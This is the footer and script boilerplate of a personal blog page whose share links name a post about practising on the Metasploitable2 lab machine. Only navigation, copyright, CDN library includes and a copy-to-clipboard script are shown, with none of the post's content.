  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/&name=Metasploitable2靶机本地练习记录&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://recyvan.github.io/2023/11/04/Metasploitable2%E9%9D%B6%E6%9C%BA%E6%9C%AC%E5%9C%B0%E7%BB%83%E4%B9%A0%E8%AE%B0%E5%BD%95/&t=Metasploitable2靶机本地练习记录"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2022-2024
    Recyvan
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="../../../../index.html">首页</a></li><!--
     --><!--
       --><li><a href="../../../../archives/">归档</a></li><!--
     --><!--
       --><li><a href="../../../../about/">关于</a></li><!--
     --><!--
       --><li><a href="../../../../links/">links</a></li><!--
     --><!--
       --><li><a href="https://recyvan.github.io/">项目</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="../../../../js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
